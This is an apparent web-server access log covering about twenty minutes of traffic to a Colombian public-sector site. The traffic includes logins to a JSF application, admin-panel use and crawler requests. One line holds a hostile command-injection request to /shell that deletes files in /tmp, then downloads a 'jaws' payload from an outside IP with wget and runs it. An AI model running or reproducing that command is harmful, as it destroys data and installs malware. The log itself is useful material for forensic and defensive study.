201.244.195.155 - - [12/Feb/2023:08:23:54 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 44515
52.167.144.97 - - [12/Feb/2023:08:23:55 -0500] "GET /bla/resoluciones/autos%202021/0539.pdf HTTP/1.1" 200 353459
201.244.195.155 - - [12/Feb/2023:08:24:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 6182013
186.155.72.249 - - [12/Feb/2023:08:24:30 -0500] "GET /BLA/boletinlegal/admin/ HTTP/1.1" 200 2324
186.155.72.249 - - [12/Feb/2023:08:24:31 -0500] "GET /BLA/boletinlegal/admin/index_files/style.css HTTP/1.1" 200 6223
186.155.72.249 - - [12/Feb/2023:08:24:31 -0500] "GET /BLA/boletinlegal/admin/images/bg.png HTTP/1.1" 200 332965
186.155.72.249 - - [12/Feb/2023:08:24:31 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.244.195.155 - - [12/Feb/2023:08:24:34 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5514
186.155.72.249 - - [12/Feb/2023:08:25:04 -0500] "POST /BLA/boletinlegal/admin/usuarios/process.php HTTP/1.1" 302 -
157.90.251.233 - - [12/Feb/2023:08:25:06 -0500] "GET / HTTP/1.1" 200 319
157.90.251.233 - - [12/Feb/2023:08:25:08 -0500] "GET / HTTP/1.1" 200 4720
186.155.72.249 - - [12/Feb/2023:08:25:04 -0500] "GET /BLA/boletinlegal/admin/index.php HTTP/1.1" 200 7243
186.155.72.249 - - [12/Feb/2023:08:25:21 -0500] "GET /BLA/boletinlegal/admin/index_files/header.png HTTP/1.1" 200 240212
186.155.72.249 - - [12/Feb/2023:08:25:21 -0500] "GET /BLA/boletinlegal/images/can.png HTTP/1.1" 200 37574
186.155.72.249 - - [12/Feb/2023:08:25:21 -0500] "GET /BLA/boletinlegal/admin/index_files/3_5.gif HTTP/1.1" 200 1633
186.155.72.249 - - [12/Feb/2023:08:25:21 -0500] "GET /BLA/boletinlegal/admin/index_files/index_files/tback.gif HTTP/1.1" 404 1334
186.155.72.249 - - [12/Feb/2023:08:25:21 -0500] "GET /BLA/boletinlegal/admin/index_files/7_1.gif HTTP/1.1" 200 1455
186.155.72.249 - - [12/Feb/2023:08:25:21 -0500] "GET /BLA/boletinlegal/admin/index_files/7_5.gif HTTP/1.1" 200 1565
186.155.72.249 - - [12/Feb/2023:08:25:21 -0500] "GET /BLA/boletinlegal/admin/index_files/2_2.gif HTTP/1.1" 200 1728
186.155.72.249 - - [12/Feb/2023:08:25:21 -0500] "GET /BLA/boletinlegal/admin/index_files/2_4.gif HTTP/1.1" 200 1763
186.155.72.249 - - [12/Feb/2023:08:25:21 -0500] "GET /BLA/boletinlegal/admin/index_files/5_1.gif HTTP/1.1" 200 1623
186.155.72.249 - - [12/Feb/2023:08:25:21 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.155.72.249 - - [12/Feb/2023:08:25:23 -0500] "GET /BLA/boletinlegal/admin/css/default.css HTTP/1.1" 200 4379
186.155.72.249 - - [12/Feb/2023:08:25:23 -0500] "GET /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7143
186.155.72.249 - - [12/Feb/2023:08:25:24 -0500] "GET /BLA/boletinlegal/admin/img/h1.png HTTP/1.1" 200 3227
186.155.72.249 - - [12/Feb/2023:08:25:24 -0500] "GET /BLA/boletinlegal/admin/img/overlay.png HTTP/1.1" 200 984
186.155.72.249 - - [12/Feb/2023:08:25:24 -0500] "GET /BLA/boletinlegal/images/favicon.ico HTTP/1.1" 404 1328
201.245.192.253 - - [12/Feb/2023:08:25:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
207.46.13.10 - - [12/Feb/2023:08:25:38 -0500] "GET /bla/resoluciones/autos%202021/0501.pdf HTTP/1.1" 200 944686
172.22.2.4 - - [12/Feb/2023:08:24:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.142 - - [12/Feb/2023:08:26:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0545.pdf HTTP/1.1" 200 344628
66.249.64.47 - - [12/Feb/2023:08:26:49 -0500] "-" 408 -
172.22.2.4 - - [12/Feb/2023:08:25:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54100
216.245.221.92 - - [12/Feb/2023:08:28:14 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [12/Feb/2023:08:28:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40944
201.245.192.253 - - [12/Feb/2023:08:28:18 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41301
207.46.13.10 - - [12/Feb/2023:08:28:48 -0500] "GET /bla/resoluciones/autos%202021/0429.pdf HTTP/1.1" 200 798166
186.155.72.249 - - [12/Feb/2023:08:28:56 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7236
186.155.72.249 - - [12/Feb/2023:08:29:00 -0500] "GET /BLA/boletinlegal/images/favicon.ico HTTP/1.1" 404 1328
157.55.39.142 - - [12/Feb/2023:08:29:49 -0500] "GET /Publicaciones/2022EE190624.pdf HTTP/1.1" 404 228
201.245.192.253 - - [12/Feb/2023:08:30:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Feb/2023:08:30:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.244.195.155 - - [12/Feb/2023:08:32:25 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
201.244.195.155 - - [12/Feb/2023:08:32:25 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:25 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12188
201.244.195.155 - - [12/Feb/2023:08:32:25 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:25 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:25 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:25 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:25 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:25 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:25 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:25 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:28 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16155
201.244.195.155 - - [12/Feb/2023:08:32:28 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:28 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:28 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:28 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:28 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:28 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:29 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:29 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
201.244.195.155 - - [12/Feb/2023:08:32:29 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:32 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:32 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 1471
201.244.195.155 - - [12/Feb/2023:08:32:33 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 52230
201.244.195.155 - - [12/Feb/2023:08:32:33 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:33 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:33 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:33 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:33 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:33 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:33 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:34 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1520
40.77.167.251 - - [12/Feb/2023:08:32:34 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
201.244.195.155 - - [12/Feb/2023:08:32:39 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 146268
201.244.195.155 - - [12/Feb/2023:08:32:40 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:46 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 49808
201.244.195.155 - - [12/Feb/2023:08:32:48 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:48 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:48 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1492
201.244.195.155 - - [12/Feb/2023:08:32:54 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 144580
201.244.195.155 - - [12/Feb/2023:08:32:55 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:55 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:55 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:55 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:55 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:55 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:32:55 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
172.22.2.4 - - [12/Feb/2023:08:31:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59035
216.245.221.92 - - [12/Feb/2023:08:33:14 -0500] "HEAD / HTTP/1.1" 200 -
201.244.195.155 - - [12/Feb/2023:08:33:28 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 715037
52.167.144.97 - - [12/Feb/2023:08:33:47 -0500] "GET /bla/resoluciones/autos%202021/0536.pdf HTTP/1.1" 200 342642
201.244.195.155 - - [12/Feb/2023:08:33:48 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 298412
201.245.192.253 - - [12/Feb/2023:08:35:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.244.195.155 - - [12/Feb/2023:08:35:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 1226515
201.244.195.155 - - [12/Feb/2023:08:35:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 2827667
201.244.195.155 - - [12/Feb/2023:08:35:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 6913926
201.244.195.155 - - [12/Feb/2023:08:36:02 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:36:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5514
52.167.144.97 - - [12/Feb/2023:08:36:08 -0500] "GET /bla/resoluciones/autos%202021/1553.pdf HTTP/1.1" 200 677301
186.155.72.249 - - [12/Feb/2023:08:37:22 -0500] "POST /BLA/boletinlegal/admin/actos/ingresar.php HTTP/1.1" 200 7236
186.155.72.249 - - [12/Feb/2023:08:37:25 -0500] "GET /BLA/boletinlegal/images/favicon.ico HTTP/1.1" 404 1328
172.22.2.4 - - [12/Feb/2023:08:36:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [12/Feb/2023:08:38:14 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [12/Feb/2023:08:38:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40944
201.245.192.253 - - [12/Feb/2023:08:38:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41301
172.22.2.4 - - [12/Feb/2023:08:37:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
40.77.167.251 - - [12/Feb/2023:08:39:25 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12503
201.244.195.155 - - [12/Feb/2023:08:39:23 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 46885
201.244.195.155 - - [12/Feb/2023:08:39:25 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:39:25 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:39:25 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:39:25 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:39:25 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:39:25 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:39:25 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:39:25 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:39:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1476
201.244.195.155 - - [12/Feb/2023:08:39:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 155180
201.244.195.155 - - [12/Feb/2023:08:39:39 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:39:39 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:39:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:39:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:39:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:39:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:39:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.244.195.155 - - [12/Feb/2023:08:40:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 626826
201.244.195.155 - - [12/Feb/2023:08:40:16 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 107100
201.245.192.253 - - [12/Feb/2023:08:40:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
79.110.72.139 - - [12/Feb/2023:08:41:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/5446.pdf HTTP/1.1" 200 400499
201.244.195.155 - - [12/Feb/2023:08:41:49 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 1609664
201.244.195.155 - - [12/Feb/2023:08:41:50 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 2112510
128.14.141.34 - - [12/Feb/2023:08:41:50 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
201.244.195.155 - - [12/Feb/2023:08:41:51 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 3580270
201.244.195.155 - - [12/Feb/2023:08:41:53 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 2927363
201.244.195.155 - - [12/Feb/2023:08:42:44 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5514
216.245.221.92 - - [12/Feb/2023:08:43:14 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Feb/2023:08:42:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Feb/2023:08:43:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59035
201.245.192.253 - - [12/Feb/2023:08:45:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
186.86.32.196 - - [12/Feb/2023:08:46:24 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
186.86.32.196 - - [12/Feb/2023:08:46:24 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:24 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12181
186.86.32.196 - - [12/Feb/2023:08:46:24 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:24 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:24 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:24 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:24 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:24 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:24 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:24 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:33 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2224
186.86.32.196 - - [12/Feb/2023:08:46:33 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
209.141.41.230 - - [12/Feb/2023:08:46:35 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+205.185.121.139/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
186.86.32.196 - - [12/Feb/2023:08:46:38 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16308
186.86.32.196 - - [12/Feb/2023:08:46:38 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:38 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:38 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:38 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:38 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:38 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:38 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:38 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:38 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:38 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:38 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:38 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.86.32.196 - - [12/Feb/2023:08:46:44 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:44 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2073
186.86.32.196 - - [12/Feb/2023:08:46:46 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 39045
186.86.32.196 - - [12/Feb/2023:08:46:47 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:47 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:47 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:47 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.86.32.196 - - [12/Feb/2023:08:46:47 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
